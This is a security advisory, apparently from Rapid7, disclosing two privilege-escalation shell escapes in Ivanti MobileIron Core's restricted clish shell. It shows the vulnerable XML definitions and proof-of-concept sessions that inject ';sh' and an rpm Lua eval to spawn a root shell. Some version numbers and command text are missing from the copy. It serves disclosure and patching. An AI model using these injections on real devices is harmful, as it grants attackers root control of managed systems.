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HistoryJun 02, 2021 - 9:04 p.m.

CVE-2021-3198 and CVE-2021-3540: MobileIron Shell Escape Privilege Escalation Vulnerabilities

Tod Beardsley

0.003 Low




CVE-2021-3198 and CVE-2021-3540: MobileIron Shell Escape Privilege Escalation Vulnerabilities

Ivanti MobileIron Core versions and suffer from two restricted shell escape vulnerabilities through the install rpm command present in theclish restricted shell. These issues have been fixed in version, released on March 15, 2021.

The first, CVE-2021-3198, is an instance of CWE-78, OS Command Injection via the install rpm url command. The second, CVE-2021-3540, is an instance of CWE-88,Argument Injection, viathe install rpm info detailcommand. Both of these shell escapes require that privileged commands be enabled (through theenable command), so given this elevated access requirement, Rapid7 suggests a CVSS score of 6.0 for both issues.

Product Description

Ivanti MobileIron “enables IT to define security and management policies for mobile devices, desktops, apps, and content.” For more about MobileIron Core, please see the vendor’s website.


This issue was discovered by Rapid7 researcher William Vu. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.


In the course of debugging a service startup issue, Rapid7 researcher William Vu discovered a shell escape in the restricted shell clish — specifically, therpm subsystem. Two methods of exploiting this vulnerability are detailed here:

CVE-2021-3198: Install RPM URL OS Command Injection

The install rpm url command suffers from a bash shell command injection vulnerability.

The command definition in config-view.xml specifies a parameter of typeURL.Sourcewhich is supplied to the**/mi/bin/installTools** script.

<COMMAND interrupt="true" name="install rpm url"
    help = "Gets the rpm and install from the given url">
 <PARAM name="urlvalue"
        help="url to get the file"
        ptype="URL.Source" />
[ `/usr/bin/id -u` -eq 0 ] && SUDO="" || SUDO="/usr/bin/sudo"
 $SUDO /mi/bin/installTools 'url' ${urlvalue}

The URL.Source type as defined intypes.xml performs insufficient sanitization of input, seen here:

        <PTYPE name="URL.Source" method="regexp"
				help="Generic URL Syntax:- https://[username]:[passwd]@domainname or ip[:port]/path_to_file

https://username:[email protected]/vm/vmware/xen.rpm"/>

Finally, the /mi/bin/installTools script invokes awget(1) command with the insecure parameter.

The below details a functional proof-of-concept exploit that results in spawning a new shell with root privileges.

CORE( rpm url;sh
--2021-01-20 21:00:28--
Connecting to failed: Connection refused.
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# uname -a
Linux x.x.x 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

CVE-2021-3540: install rpm info detail Argument Injection

The install rpm info detail command suffers from an rpm argument injection vulnerability.

The command definition in config-view.xml specifies a parameter of typeCMD_STRING, which is supplied to anrpm(8) command.

<COMMAND interrupt="true" name="install rpm info detail"
			help = "Gets list of rpms installed">
<PARAM name="pkg"
			help="Package name to find details"
			ptype="CMD_STRING" />
[ `/usr/bin/id -u` -eq 0 ] && SUDO="" || SUDO="/usr/bin/sudo"
$SUDO /bin/rpm -qi ${pkg}

The CMD_STRING type as defined intypes.xml performs no sanitization of input.

			help="command string"/>

Finally, the rpm(8) command is invoked with the insecure parameter.

The below details a functional proof-of-concept exploit that results in executing the shipping Lua interpreter, which in turn spawns a root shell.

CORE( rpm info detail --help
Usage: rpm [OPTION...]
Common options for all rpm modes and executables:
		-E, --eval='EXPR'                print macro expansion of EXPR
CORE( rpm info detail -E%{lua:rpm.interactive()}
RPM Interactive Lua 5.1 Interpreter
> os.execute("/bin/sh")
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# uname -a
Linux x.x.x 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux


An attacker who has the password to enable privileged commands (either through their regular job function or by guessing the enable command password) could leverage this vulnerability to take complete, root-level control of the affected device.

Vendor Statement

Ivanti/MobileIron has addressed the issue in the Core (March 4, 2021) release. As threats evolve and emerge, we strongly recommend that customers review security advisories and follow the recommended guidance.


The enable password to MobileIron devices should be as complex and restricted as is practicable. Users with access to the enable password can already cause significant disruptions to the normal operation of MobileIron-based services. Absent a patch, operators of MobileIron devices should ensure that only trusted, identified individuals have access to this valuable enable password.

Disclosure Timeline

  • January 2021: Issue discovered by William Vu of Rapid7
  • Thu, Jan 21, 2021: Initial disclosure to Ivanti, with details provided
  • Thu, Mar 4, 2021: Version released by the vendor
  • Fri, Mar 19, 2021: Further confirmation of the issues and fixes with Ivanti
  • Wed, June 2, 2021: Public disclosure

0.003 Low




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